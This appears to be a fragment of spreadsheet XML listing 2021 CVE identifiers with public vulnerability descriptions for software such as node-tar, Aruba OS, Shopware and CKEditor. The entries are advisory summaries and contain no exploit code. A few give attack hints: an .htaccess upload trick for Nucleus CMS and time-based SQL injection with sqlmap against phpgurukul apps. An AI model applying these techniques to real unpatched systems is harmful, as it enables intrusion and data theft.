    <t>ckeditor is an open source WYSIWYG HTML editor with rich content support. A potential vulnerability has been discovered in CKEditor 4 [Fake Objects](https://ckeditor.com/cke4/addon/fakeobjects) package. The vulnerability allowed to inject malformed Fake Objects HTML, which could result in executing JavaScript code. It affects all users using the CKEditor 4 plugins listed above at version &lt; 4.16.2. The problem has been recognized and patched. The fix will be available in version 4.16.2.</t>
  </si>
  <si>
    <t>CVE-2021-37696</t>
  </si>
  <si>
    <t>tmerc-cogs are a collection of open source plugins for the Red Discord bot. A vulnerability has been found in the code that allows any user to access sensitive information by crafting a specific MassDM message. Issue is patched in commit 92325be650a6c17940cc52611797533ed95dbbe1. All users are advised to update to the current commit. As a workaround users may unload the MassDM cog or globally disable the `[p]massdm` command.</t>
  </si>
  <si>
    <t>CVE-2021-37697</t>
  </si>
  <si>
    <t>tmerc-cogs are a collection of open source plugins for the Red Discord bot. A vulnerability has been found in the code that allows any user to access sensitive information by crafting a specific membership event message. Issue is patched in commit d63c49b4cfc30c795336e4fff08cba3795e0fcc0. As a workaround users may unload the Welcome cog.</t>
  </si>
  <si>
    <t>CVE-2021-37698</t>
  </si>
  <si>
    <t>Icinga is a monitoring system which checks the availability of network resources, notifies users of outages, and generates performance data for reporting. In versions 2.5.0 through 2.13.0, ElasticsearchWriter, GelfWriter, InfluxdbWriter and Influxdb2Writer do not verify the server's certificate despite a certificate authority being specified. Icinga 2 instances which connect to any of the mentioned time series databases (TSDBs) using TLS over a spoofable infrastructure should immediately upgrade to version 2.13.1, 2.12.6, or 2.11.11 to patch the issue. Such instances should also change the credentials (if any) used by the TSDB writer feature to authenticate against the TSDB. There are no workarounds aside from upgrading.</t>
  </si>
  <si>
    <t>CVE-2021-37699</t>
  </si>
  <si>
    <t>Next.js is an open source website development framework to be used with the React library. In affected versions specially encoded paths could be used when pages/_error.js was statically generated allowing an open redirect to occur to an external site. In general, this redirect does not directly harm users although can allow for phishing attacks by redirecting to an attacker's domain from a trusted domain. We recommend everyone to upgrade regardless of whether you can reproduce the issue or not. The issue has been patched in release 11.1.0.</t>
  </si>
  <si>
    <t>CVE-2021-3770</t>
  </si>
  <si>
    <t>vim is vulnerable to Heap-based Buffer Overflow</t>
  </si>
  <si>
    <t>CVE-2021-37700</t>
  </si>
  <si>
    <t>@github/paste-markdown is an npm package for pasting markdown objects. A self Cross-Site Scripting vulnerability exists in the @github/paste-markdown before version 0.3.4. If the clipboard data contains the string `&lt;table&gt;`, a **div** is dynamically created, and the clipboard content is copied into its **innerHTML** property without any sanitization, resulting in improper execution of JavaScript in the browser of the victim (the user who pasted the code). Users directed to copy text from a malicious website and paste it into pages that utilize this library are affected. This is fixed in version 0.3.4. Refer the to the referenced GitHub Advisory for more details including an example exploit.</t>
  </si>
  <si>
    <t>CVE-2021-37701</t>
  </si>
  <si>
    <t>The npm package "tar" (aka node-tar) before versions 4.4.16, 5.0.8, and 6.1.7 has an arbitrary file creation/overwrite and arbitrary code execution vulnerability. node-tar aims to guarantee that any file whose location would be modified by a symbolic link is not extracted. This is, in part, achieved by ensuring that extracted directories are not symlinks. Additionally, in order to prevent unnecessary stat calls to determine whether a given path is a directory, paths are cached when directories are created. This logic was insufficient when extracting tar files that contained both a directory and a symlink with the same name as the directory, where the symlink and directory names in the archive entry used backslashes as a path separator on posix systems. The cache checking logic used both `\` and `/` characters as path separators, however `\` is a valid filename character on posix systems. By first creating a directory, and then replacing that directory with a symlink, it was thus possible to bypass node-tar symlink checks on directories, essentially allowing an untrusted tar file to symlink into an arbitrary location and subsequently extracting arbitrary files into that location, thus allowing arbitrary file creation and overwrite. Additionally, a similar confusion could arise on case-insensitive filesystems. If a tar archive contained a directory at `FOO`, followed by a symbolic link named `foo`, then on case-insensitive file systems, the creation of the symbolic link would remove the directory from the filesystem, but _not_ from the internal directory cache, as it would not be treated as a cache hit. A subsequent file entry within the `FOO` directory would then be placed in the target of the symbolic link, thinking that the directory had already been created. These issues were addressed in releases 4.4.16, 5.0.8 and 6.1.7. The v3 branch of node-tar has been deprecated and did not receive patches for these issues. If you are still using a v3 release we recommend you update to a more recent version of node-tar. If this is not possible, a workaround is available in the referenced GHSA-9r2w-394v-53qc.</t>
  </si>
  <si>
    <t>CVE-2021-37702</t>
  </si>
  <si>
    <t>Pimcore is an open source data &amp; experience management platform. Prior to version 10.1.1, Data Object CSV import allows formular injection. The problem is patched in 10.1.1. Aside from upgrading, one may apply the patch manually as a workaround.</t>
  </si>
  <si>
    <t>CVE-2021-37703</t>
  </si>
  <si>
    <t>Discourse is an open-source platform for community discussion. In Discourse before versions 2.7.8 and 2.8.0.beta5, a user's read state for a topic such as the last read post number and the notification level is exposed.</t>
  </si>
  <si>
    <t>CVE-2021-37704</t>
  </si>
  <si>
    <t>PhpFastCache is a high-performance backend cache system (packagist package phpfastcache/phpfastcache). In versions before 6.1.5, 7.1.2, and 8.0.7 the `phpinfo()` can be exposed if the `/vendor` is not protected from public access. This is a rare situation today since the vendor directory is often located outside the web directory or protected via server rule (.htaccess, etc). Only the v6, v7 and v8 will be patched respectively in 8.0.7, 7.1.2, 6.1.5. Older versions such as v5, v4 are not longer supported and will **NOT** be patched. As a workaround, protect the `/vendor` directory from public access.</t>
  </si>
  <si>
    <t>CVE-2021-37705</t>
  </si>
  <si>
    <t>OneFuzz is an open source self-hosted Fuzzing-As-A-Service platform. Starting with OneFuzz 2.12.0 or greater, an incomplete authorization check allows an authenticated user from any Azure Active Directory tenant to make authorized API calls to a vulnerable OneFuzz instance. To be vulnerable, a OneFuzz deployment must be both version 2.12.0 or greater and deployed with the non-default --multi_tenant_domain option. This can result in read/write access to private data such as software vulnerability and crash information, security testing tools and proprietary code and symbols. Via authorized API calls, this also enables tampering with existing data and unauthorized code execution on Azure compute resources. This issue is resolved starting in release 2.31.0, via the addition of application-level check of the bearer token's `issuer` against an administrator-configured allowlist. As a workaround users can restrict access to the tenant of a deployed OneFuzz instance &lt; 2.31.0 by redeploying in the default configuration, which omits the `--multi_tenant_domain` option.</t>
  </si>
  <si>
    <t>CVE-2021-37706</t>
  </si>
  <si>
    <t>PJSIP is a free and open source multimedia communication library written in C language implementing standard based protocols such as SIP, SDP, RTP, STUN, TURN, and ICE. In affected versions if the incoming STUN message contains an ERROR-CODE attribute, the header length is not checked before performing a subtraction operation, potentially resulting in an integer underflow scenario. This issue affects all users that use STUN. A malicious actor located within the victim’s network may forge and send a specially crafted UDP (STUN) message that could remotely execute arbitrary code on the victim’s machine. Users are advised to upgrade as soon as possible. There are no known workarounds.</t>
  </si>
  <si>
    <t>CVE-2021-37707</t>
  </si>
  <si>
    <t>Shopware is an open source eCommerce platform. Versions prior to 6.4.3.1 contain a vulnerability that allows manipulation of product reviews via API. Version 6.4.3.1 contains a patch. As workarounds for older versions of 6.1, 6.2, and 6.3, corresponding security measures are also available via a plugin.</t>
  </si>
  <si>
    <t>CVE-2021-37708</t>
  </si>
  <si>
    <t>Shopware is an open source eCommerce platform. Versions prior to 6.4.3.1 contain a command injection vulnerability in mail agent settings. Version 6.4.3.1 contains a patch. As workarounds for older versions of 6.1, 6.2, and 6.3, corresponding security measures are also available via a plugin.</t>
  </si>
  <si>
    <t>CVE-2021-37709</t>
  </si>
  <si>
    <t>Shopware is an open source eCommerce platform. Versions prior to 6.4.3.1 contain a vulnerability involving an insecure direct object reference of log files of the Import/Export feature. Version 6.4.3.1 contains a patch. As workarounds for older versions of 6.1, 6.2, and 6.3, corresponding security measures are also available via a plugin.</t>
  </si>
  <si>
    <t>CVE-2021-37710</t>
  </si>
  <si>
    <t>Shopware is an open source eCommerce platform. Versions prior to 6.4.3.1 contain a Cross-Site Scripting vulnerability via SVG media files. Version 6.4.3.1 contains a patch. As workarounds for older versions of 6.1, 6.2, and 6.3, corresponding security measures are also available via a plugin.</t>
  </si>
  <si>
    <t>CVE-2021-37711</t>
  </si>
  <si>
    <t>Versions prior to 6.4.3.1 contain an authenticated server-side request forgery vulnerability in file upload via URL. Version 6.4.3.1 contains a patch. As workarounds for older versions of 6.1, 6.2, and 6.3, corresponding security measures are also available via a plugin.</t>
  </si>
  <si>
    <t>CVE-2021-37712</t>
  </si>
  <si>
    <t>The npm package "tar" (aka node-tar) before versions 4.4.18, 5.0.10, and 6.1.9 has an arbitrary file creation/overwrite and arbitrary code execution vulnerability. node-tar aims to guarantee that any file whose location would be modified by a symbolic link is not extracted. This is, in part, achieved by ensuring that extracted directories are not symlinks. Additionally, in order to prevent unnecessary stat calls to determine whether a given path is a directory, paths are cached when directories are created. This logic was insufficient when extracting tar files that contained both a directory and a symlink with names containing unicode values that normalized to the same value. Additionally, on Windows systems, long path portions would resolve to the same file system entities as their 8.3 "short path" counterparts. A specially crafted tar archive could thus include a directory with one form of the path, followed by a symbolic link with a different string that resolves to the same file system entity, followed by a file using the first form. By first creating a directory, and then replacing that directory with a symlink that had a different apparent name that resolved to the same entry in the filesystem, it was thus possible to bypass node-tar symlink checks on directories, essentially allowing an untrusted tar file to symlink into an arbitrary location and subsequently extracting arbitrary files into that location, thus allowing arbitrary file creation and overwrite. These issues were addressed in releases 4.4.18, 5.0.10 and 6.1.9. The v3 branch of node-tar has been deprecated and did not receive patches for these issues. If you are still using a v3 release we recommend you update to a more recent version of node-tar. If this is not possible, a workaround is available in the referenced GHSA-qq89-hq3f-393p.</t>
  </si>
  <si>
    <t>CVE-2021-37713</t>
  </si>
  <si>
    <t>The npm package "tar" (aka node-tar) before versions 4.4.18, 5.0.10, and 6.1.9 has an arbitrary file creation/overwrite and arbitrary code execution vulnerability. node-tar aims to guarantee that any file whose location would be outside of the extraction target directory is not extracted. This is, in part, accomplished by sanitizing absolute paths of entries within the archive, skipping archive entries that contain `..` path portions, and resolving the sanitized paths against the extraction target directory. This logic was insufficient on Windows systems when extracting tar files that contained a path that was not an absolute path, but specified a drive letter different from the extraction target, such as `C:some\path`. If the drive letter does not match the extraction target, for example `D:\extraction\dir`, then the result of `path.resolve(extractionDirectory, entryPath)` would resolve against the current working directory on the `C:` drive, rather than the extraction target directory. Additionally, a `..` portion of the path could occur immediately after the drive letter, such as `C:../foo`, and was not properly sanitized by the logic that checked for `..` within the normalized and split portions of the path. This only affects users of `node-tar` on Windows systems. These issues were addressed in releases 4.4.18, 5.0.10 and 6.1.9. The v3 branch of node-tar has been deprecated and did not receive patches for these issues. If you are still using a v3 release we recommend you update to a more recent version of node-tar. There is no reasonable way to work around this issue without performing the same path normalization procedures that node-tar now does. Users are encouraged to upgrade to the latest patched versions of node-tar, rather than attempt to sanitize paths themselves.</t>
  </si>
  <si>
    <t>CVE-2021-37714</t>
  </si>
  <si>
    <t>jsoup is a Java library for working with HTML. Those using jsoup versions prior to 1.14.2 to parse untrusted HTML or XML may be vulnerable to DOS attacks. If the parser is run on user supplied input, an attacker may supply content that causes the parser to get stuck (loop indefinitely until cancelled), to complete more slowly than usual, or to throw an unexpected exception. This effect may support a denial of service attack. The issue is patched in version 1.14.2. There are a few available workarounds. Users may rate limit input parsing, limit the size of inputs based on system resources, and/or implement thread watchdogs to cap and timeout parse runtimes.</t>
  </si>
  <si>
    <t>CVE-2021-37715</t>
  </si>
  <si>
    <t>A remote cross-site scripting (XSS) vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.13.0. Aruba has released upgrades for the Aruba AirWave Management Platform that address this security vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-37716</t>
  </si>
  <si>
    <t>A remote buffer overflow vulnerability was discovered in Aruba SD-WAN Software and Gateways; Aruba Operating System Software version(s): Prior to 8.6.0.4-2.2.0.4; Prior to 8.7.1.2, 8.6.0.8, 8.5.0.12, 8.3.0.15. Aruba has released patches for Aruba SD-WAN Software and Gateways and ArubaOS that address this security vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-37717</t>
  </si>
  <si>
    <t>A remote arbitrary command execution vulnerability was discovered in Aruba SD-WAN Software and Gateways; Aruba Operating System Software version(s): Prior to 8.6.0.4-2.2.0.6; Prior to 8.7.1.4, 8.6.0.7, 8.5.0.12, 8.3.0.16. Aruba has released patches for Aruba SD-WAN Software and Gateways and ArubaOS that address this security vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-37718</t>
  </si>
  <si>
    <t>CVE-2021-37719</t>
  </si>
  <si>
    <t>A remote arbitrary command execution vulnerability was discovered in Aruba SD-WAN Software and Gateways; Aruba Operating System Software version(s): Prior to 8.6.0.4-2.2.0.4; Prior to 8.7.1.4, 8.6.0.9, 8.5.0.13, 8.3.0.16, 6.5.4.20, 6.4.4.25. Aruba has released patches for Aruba SD-WAN Software and Gateways and ArubaOS that address this security vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-3772</t>
  </si>
  <si>
    <t>A flaw was found in the Linux SCTP stack. A blind attacker may be able to kill an existing SCTP association through invalid chunks if the attacker knows the IP-addresses and port numbers being used and the attacker can send packets with spoofed IP addresses.</t>
  </si>
  <si>
    <t>CVE-2021-37720</t>
  </si>
  <si>
    <t>CVE-2021-37721</t>
  </si>
  <si>
    <t>CVE-2021-37722</t>
  </si>
  <si>
    <t>CVE-2021-37723</t>
  </si>
  <si>
    <t>A remote arbitrary command execution vulnerability was discovered in Aruba Operating System Software version(s): Prior to 8.7.1.2, 8.6.0.8, 8.5.0.12, 8.3.0.16. Aruba has released patches for ArubaOS that address this security vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-37724</t>
  </si>
  <si>
    <t>CVE-2021-37725</t>
  </si>
  <si>
    <t>A remote cross-site request forgery (csrf) vulnerability was discovered in Aruba SD-WAN Software and Gateways; Aruba Operating System Software version(s): Prior to 8.6.0.4-2.2.0.4; Prior to 8.8.0.1, 8.7.1.2, 8.6.0.8, 8.5.0.12, 8.3.0.15. Aruba has released patches for Aruba SD-WAN Software and Gateways and ArubaOS that address this security vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-37726</t>
  </si>
  <si>
    <t>A remote buffer overflow vulnerability was discovered in HPE Aruba Instant (IAP) version(s): Aruba Instant 8.7.x.x: 8.7.0.0 through 8.7.1.2. Aruba has released patches for Aruba Instant (IAP) that address this security vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-37727</t>
  </si>
  <si>
    <t>A remote arbitrary command execution vulnerability was discovered in HPE Aruba Instant (IAP) version(s): 6.4.x.x: 6.4.4.8-4.2.4.18 and below; Aruba Instant 6.5.x.x: 6.5.4.20 and below; Aruba Instant 8.5.x.x: 8.5.0.12 and below; Aruba Instant 8.6.x.x: 8.6.0.11 and below; Aruba Instant 8.7.x.x: 8.7.1.3 and below. Aruba has released patches for Aruba Instant (IAP) that address this security vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-37728</t>
  </si>
  <si>
    <t>A remote path traversal vulnerability was discovered in Aruba Operating System Software version(s): Prior to 8.8.0.1, 8.7.1.4, 8.6.0.11, 8.5.0.13. Aruba has released patches for ArubaOS that address this security vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-37729</t>
  </si>
  <si>
    <t>A remote path traversal vulnerability was discovered in Aruba SD-WAN Software and Gateways; Aruba Operating System Software version(s): Prior to 8.6.0.0-2.2.0.4; Prior to 8.7.1.3, 8.6.0.9, 8.5.0.12, 8.3.0.16, 6.5.4.19, 6.4.4.25. Aruba has released patches for Aruba SD-WAN Software and Gateways and ArubaOS that address this security vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-3773</t>
  </si>
  <si>
    <t>A flaw in netfilter could allow a network-connected attacker to infer openvpn connection endpoint information for further use in traditional network attacks.</t>
  </si>
  <si>
    <t>CVE-2021-37730</t>
  </si>
  <si>
    <t>A remote arbitrary command execution vulnerability was discovered in HPE Aruba Instant (IAP) version(s): Aruba Instant 6.4.x.x: 6.4.4.8-4.2.4.18 and below; Aruba Instant 6.5.x.x: 6.5.4.20 and below; Aruba Instant 8.5.x.x: 8.5.0.12 and below; Aruba Instant 8.6.x.x: 8.6.0.11 and below; Aruba Instant 8.7.x.x: 8.7.1.3 and below. Aruba has released patches for Aruba Instant (IAP) that address this security vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-37731</t>
  </si>
  <si>
    <t>A local path traversal vulnerability was discovered in Aruba SD-WAN Software and Gateways; Aruba Operating System Software version(s): Prior to 8.6.0.0-2.2.0.4; Prior to 8.7.1.1, 8.6.0.7, 8.5.0.12, 8.3.0.16. Aruba has released patches for Aruba SD-WAN Software and Gateways and ArubaOS that address this security vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-37732</t>
  </si>
  <si>
    <t>A remote arbitrary command execution vulnerability was discovered in HPE Aruba Instant (IAP) version(s): Aruba Instant 6.4.x.x: 6.4.4.8-4.2.4.17 and below; Aruba Instant 6.5.x.x: 6.5.4.18 and below; Aruba Instant 8.5.x.x: 8.5.0.11 and below; Aruba Instant 8.6.x.x: 8.6.0.6 and below; Aruba Instant 8.7.x.x: 8.7.1.0 and below. Aruba has released patches for Aruba Instant (IAP) that address this security vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-37733</t>
  </si>
  <si>
    <t>A remote path traversal vulnerability was discovered in Aruba SD-WAN Software and Gateways; Aruba Operating System Software version(s): Prior to 8.6.0.4-2.2.0.4; Prior to 8.7.1.1, 8.6.0.7, 8.5.0.11, 8.3.0.16. Aruba has released patches for Aruba SD-WAN Software and Gateways and ArubaOS that address this security vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-37734</t>
  </si>
  <si>
    <t>A remote unauthorized read access to files vulnerability was discovered in Aruba Instant version(s): 6.4.x.x: 6.4.4.8-4.2.4.18 and below; Aruba Instant 6.5.x.x: 6.5.4.19 and below; Aruba Instant 8.5.x.x: 8.5.0.12 and below; Aruba Instant 8.6.x.x: 8.6.0.11 and below; Aruba Instant 8.7.x.x: 8.7.1.3 and below; Aruba Instant 8.8.x.x: 8.8.0.0 and below. Aruba has released patches for Aruba Instant (IAP) that address this security vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-37735</t>
  </si>
  <si>
    <t>A remote denial of service vulnerability was discovered in Aruba Instant version(s): Aruba Instant 6.5.x.x: 6.5.4.18 and below; Aruba Instant 8.5.x.x: 8.5.0.10 and below; Aruba Instant 8.6.x.x: 8.6.0.4 and below. Aruba has released patches for Aruba Instant (IAP) that address this security vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-37736</t>
  </si>
  <si>
    <t>A remote authentication bypass vulnerability was discovered in Aruba ClearPass Policy Manager version(s): ClearPass Policy Manager 6.10.x prior to 6.10.2 - - ClearPass Policy Manager 6.9.x prior to 6.9.7-HF1 - - ClearPass Policy Manager 6.8.x prior to 6.8.9-HF1. Aruba has released patches for ClearPass Policy Manager that address this security vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-37737</t>
  </si>
  <si>
    <t>A remote SQL injection vulnerability was discovered in Aruba ClearPass Policy Manager version(s): ClearPass Policy Manager 6.10.x prior to 6.10.2 - - ClearPass Policy Manager 6.9.x prior to 6.9.7-HF1 - - ClearPass Policy Manager 6.8.x prior to 6.8.9-HF1. Aruba has released patches for ClearPass Policy Manager that address this security vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-37738</t>
  </si>
  <si>
    <t>A remote disclosure of sensitive information vulnerability was discovered in Aruba ClearPass Policy Manager version(s): ClearPass Policy Manager 6.10.x prior to 6.10.2 - - ClearPass Policy Manager 6.9.x prior to 6.9.7-HF1 - - ClearPass Policy Manager 6.8.x prior to 6.8.9-HF1. Aruba has released patches for ClearPass Policy Manager that address this security vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-37739</t>
  </si>
  <si>
    <t>A remote arbitrary command execution vulnerability was discovered in Aruba ClearPass Policy Manager version(s): ClearPass Policy Manager 6.10.x prior to 6.10.2 - - ClearPass Policy Manager 6.9.x prior to 6.9.7-HF1 - - ClearPass Policy Manager 6.8.x prior to 6.8.9-HF1. Aruba has released patches for ClearPass Policy Manager that address this security vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-3774</t>
  </si>
  <si>
    <t>Meross Smart Wi-Fi 2 Way Wall Switch (MSS550X), on its 3.1.3 version and before, creates an open Wi-Fi Access Point without the required security measures in its initial setup. This could allow a remote attacker to obtain the Wi-Fi SSID as well as the password configured by the user from Meross app via Http/JSON plain request.</t>
  </si>
  <si>
    <t>CVE-2021-37740</t>
  </si>
  <si>
    <t>A denial of service vulnerability exists in MDT's firmware for the KNXnet/IP Secure router SCN-IP100.03 and KNX IP interface SCN-IP000.03 before v3.0.4, that allows a remote attacker to turn the device unresponsive to all requests on the KNXnet/IP Secure layer, until the device is rebooted, via a SESSION_REQUEST frame with a modified total length field.</t>
  </si>
  <si>
    <t>CVE-2021-37741</t>
  </si>
  <si>
    <t>ManageEngine ADManager Plus before 7111 has Pre-authentication RCE vulnerabilities.</t>
  </si>
  <si>
    <t>CVE-2021-37742</t>
  </si>
  <si>
    <t>app/View/Elements/GalaxyClusters/view_relation_tree.ctp in MISP 2.4.147 allows Stored XSS when viewing galaxy cluster relationships.</t>
  </si>
  <si>
    <t>CVE-2021-37743</t>
  </si>
  <si>
    <t>app/View/GalaxyElements/ajax/index.ctp in MISP 2.4.147 allows Stored XSS when viewing galaxy cluster elements in JSON format.</t>
  </si>
  <si>
    <t>CVE-2021-37746</t>
  </si>
  <si>
    <t>textview_uri_security_check in textview.c in Claws Mail before 3.18.0, and Sylpheed through 3.7.0, does not have sufficient link checks before accepting a click.</t>
  </si>
  <si>
    <t>CVE-2021-37748</t>
  </si>
  <si>
    <t>Multiple buffer overflows in the limited configuration shell (/sbin/gs_config) on Grandstream HT801 devices before 1.0.29 allow remote authenticated users to execute arbitrary code as root via a crafted manage_if setting, thus bypassing the intended restrictions of this shell and taking full control of the device. There are default weak credentials that can be used to authenticate.</t>
  </si>
  <si>
    <t>CVE-2021-37749</t>
  </si>
  <si>
    <t>MapService.svc in Hexagon GeoMedia WebMap 2020 before Update 2 (aka 16.6.2.66) allows blind SQL Injection via the Id (within sourceItems) parameter to the GetMap method.</t>
  </si>
  <si>
    <t>CVE-2021-3775</t>
  </si>
  <si>
    <t>CVE-2021-37750</t>
  </si>
  <si>
    <t>The Key Distribution Center (KDC) in MIT Kerberos 5 (aka krb5) before 1.18.5 and 1.19.x before 1.19.3 has a NULL pointer dereference in kdc/do_tgs_req.c via a FAST inner body that lacks a server field.</t>
  </si>
  <si>
    <t>CVE-2021-37759</t>
  </si>
  <si>
    <t>A Session ID leak in the DEBUG log file in Graylog before 4.1.2 allows attackers to escalate privileges (to the access level of the leaked session ID).</t>
  </si>
  <si>
    <t>CVE-2021-3776</t>
  </si>
  <si>
    <t>CVE-2021-37760</t>
  </si>
  <si>
    <t>A Session ID leak in the audit log in Graylog before 4.1.2 allows attackers to escalate privileges (to the access level of the leaked session ID).</t>
  </si>
  <si>
    <t>CVE-2021-37761</t>
  </si>
  <si>
    <t>Zoho ManageEngine ADManager Plus version 7110 and prior is vulnerable to unrestricted file upload, leading to remote code execution.</t>
  </si>
  <si>
    <t>CVE-2021-37762</t>
  </si>
  <si>
    <t>Zoho ManageEngine ADManager Plus version 7110 and prior allows unrestricted file overwrite leading to remote code execution.</t>
  </si>
  <si>
    <t>CVE-2021-37764</t>
  </si>
  <si>
    <t>Arbitrary File Deletion vulnerability in XOS-Shop xos_shop_system 1.0.9 via current_manufacturer_image parameter to /shop/admin/manufacturers.php.</t>
  </si>
  <si>
    <t>CVE-2021-3777</t>
  </si>
  <si>
    <t>nodejs-tmpl is vulnerable to Inefficient Regular Expression Complexity</t>
  </si>
  <si>
    <t>CVE-2021-37770</t>
  </si>
  <si>
    <t>Nucleus CMS v3.71 is affected by a file upload vulnerability. In this vulnerability, we can use upload to change the upload path to the path without the Htaccess file. Upload an Htaccess file and write it to AddType application / x-httpd-php.jpg. In this way, an attacker can upload a picture with shell, treat it as PHP, execute commands, so as to take down website resources.</t>
  </si>
  <si>
    <t>CVE-2021-37777</t>
  </si>
  <si>
    <t>Gila CMS 2.2.0 is vulnerable to Insecure Direct Object Reference (IDOR). Thumbnails uploaded by one site owner are visible by another site owner just by knowing the other site name and fuzzing for picture names. This leads to sensitive information disclosure.</t>
  </si>
  <si>
    <t>CVE-2021-37778</t>
  </si>
  <si>
    <t>There is a buffer overflow in gps-sdr-sim v1.0 when parsing long command line parameters, which can lead to DoS or code execution.</t>
  </si>
  <si>
    <t>CVE-2021-3778</t>
  </si>
  <si>
    <t>CVE-2021-37781</t>
  </si>
  <si>
    <t>Employee Record Management System v 1.2 is vulnerable to Cross Site Scripting (XSS) via editempprofile.php.</t>
  </si>
  <si>
    <t>CVE-2021-37782</t>
  </si>
  <si>
    <t>Employee Record Management System v 1.2 is vulnerable to SQL Injection via editempprofile.php.</t>
  </si>
  <si>
    <t>CVE-2021-37786</t>
  </si>
  <si>
    <t>Certain Federal Office of Information Technology Systems and Telecommunication FOITT products are affected by improper handling of exceptional conditions. This affects COVID Certificate App IOS 2.2.0 and below affected, patch in progress and COVID Certificate Check App IOS 2.2.0 and below affected, patch in progress. A denial of service (physically proximate) could be caused by scanning a crafted QR code.</t>
  </si>
  <si>
    <t>CVE-2021-37788</t>
  </si>
  <si>
    <t>A vulnerability in the web UI of Gurock TestRail v5.3.0.3603 could allow an unauthenticated, remote attacker to affect the integrity of a device via a clickjacking attack. The vulnerability is due to insufficient input validation of iFrame data in HTTP requests that are sent to an affected device. An attacker could exploit this vulnerability by sending crafted HTTP packets with malicious iFrame data. A successful exploit could allow the attacker to perform a clickjacking attack where the user is tricked into clicking a malicious link.</t>
  </si>
  <si>
    <t>CVE-2021-37789</t>
  </si>
  <si>
    <t>stb_image.h 2.27 has a heap-based buffer over in stbi__jpeg_load, leading to Information Disclosure or Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-3779</t>
  </si>
  <si>
    <t>A malicious MySQL server can request local file content from a client using ruby-mysql prior to version 2.10.0 without explicit authorization from the user. This issue was resolved in version 2.10.0 and later.</t>
  </si>
  <si>
    <t>CVE-2021-37791</t>
  </si>
  <si>
    <t>MyAdmin v1.0 is affected by an incorrect access control vulnerability in viewing personal center in /api/user/userData?userCode=admin.</t>
  </si>
  <si>
    <t>CVE-2021-37794</t>
  </si>
  <si>
    <t>A stored cross-site scripting (XSS) vulnerability exists in FileBrowser &lt; v2.16.0 that allows an authenticated user authorized to upload a malicious .svg file which acts as a stored XSS payload. If this stored XSS payload is triggered by an administrator it will trigger malicious OS commands on the server running the FileBrowser instance.</t>
  </si>
  <si>
    <t>CVE-2021-3780</t>
  </si>
  <si>
    <t>peertube is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')</t>
  </si>
  <si>
    <t>CVE-2021-37803</t>
  </si>
  <si>
    <t>An SQL Injection vulnerability exists in Sourcecodester Online Covid Vaccination Scheduler System 1.0 via the username in lognin.php .</t>
  </si>
  <si>
    <t>CVE-2021-37805</t>
  </si>
  <si>
    <t>A Stored Cross Site Scripting (XSS) vunerability exists in Sourcecodeste Vehicle Parking Management System affected version 1.0 is via the add-vehicle.php endpoint.</t>
  </si>
  <si>
    <t>CVE-2021-37806</t>
  </si>
  <si>
    <t>An SQL Injection vulnerability exists in https://phpgurukul.com Vehicle Parking Management System affected version 1.0. The system is vulnerable to time-based SQL injection on multiple endpoints. Based on the SLEEP(N) function payload that will sleep for a number of seconds used on the (1) editid , (2) viewid, and (3) catename parameters, the server response is about (N) seconds delay respectively which mean it is vulnerable to MySQL Blind (Time Based). An attacker can use sqlmap to further the exploitation for extracting sensitive information from the database.</t>
  </si>
  <si>
    <t>CVE-2021-37807</t>
  </si>
  <si>
    <t>An SQL Injection vulneraility exists in https://phpgurukul.com Online Shopping Portal 3.1 via the email parameter on the /check_availability.php endpoint that serves as a checker whether a new user's email is already exist within the database.</t>
  </si>
  <si>
    <t>CVE-2021-37808</t>
  </si>
  <si>
    <t>SQL Injection vulnerabilities exist in https://phpgurukul.com News Portal Project 3.1 via the (1) category, (2) subcategory, (3) sucatdescription, and (4) username parameters, the server response is about (N) seconds delay respectively which mean it is vulnerable to MySQL Blind (Time Based). An attacker can use sqlmap to further the exploitation for extracting sensitive information from the database.</t>
  </si>
  <si>
    <t>CVE-2021-3781</t>
  </si>
  <si>
    <t>A trivial sandbox (enabled with the `-dSAFER` option) escape flaw was found in the ghostscript interpreter by injecting a specially crafted pipe command. This flaw allows a specially crafted document to execute arbitrary commands on the system in the context of the ghostscript interpreter. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.</t>
  </si>
  <si>
    <t>CVE-2021-37819</t>
  </si>
  <si>
    <t>PDF Labs pdftk-java v3.2.3 was discovered to contain an infinite loop via the component /text/pdf/PdfReader.java.</t>
  </si>
  <si>
    <t>CVE-2021-3782</t>
  </si>
  <si>
    <t>An internal reference count is held on the buffer pool, incremented every time a new buffer is created from the pool. The reference count is maintained as an int; on LP64 systems this can cause the reference count to overflow if the client creates a large number of wl_shm buffer objects, or if it can coerce the server to create a large number of external references to the buffer storage. With the reference count overflowing, a use-after-free can be constructed on the wl_shm_pool tracking structure, where values may be incremented or decremented; it may also be possible to construct a limited oracle to leak 4 bytes of server-side memory to the attacking client at a time.</t>
  </si>
  <si>
    <t>CVE-2021-37823</t>
  </si>
  <si>
    <t>OpenCart 3.0.3.7 allows users to obtain database information or read server files through SQL injection in the background.</t>
  </si>
  <si>
    <t>CVE-2021-3783</t>
  </si>
  <si>
    <t>yourls is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')</t>
  </si>
  <si>
    <t>CVE-2021-37832</t>
  </si>
  <si>
    <t>A SQL injection vulnerability exists in version 3.0.2 of Hotel Druid when SQLite is being used as the application database. A malicious attacker can issue SQL commands to the SQLite database through the vulnerable idappartamenti parameter.</t>
  </si>
  <si>
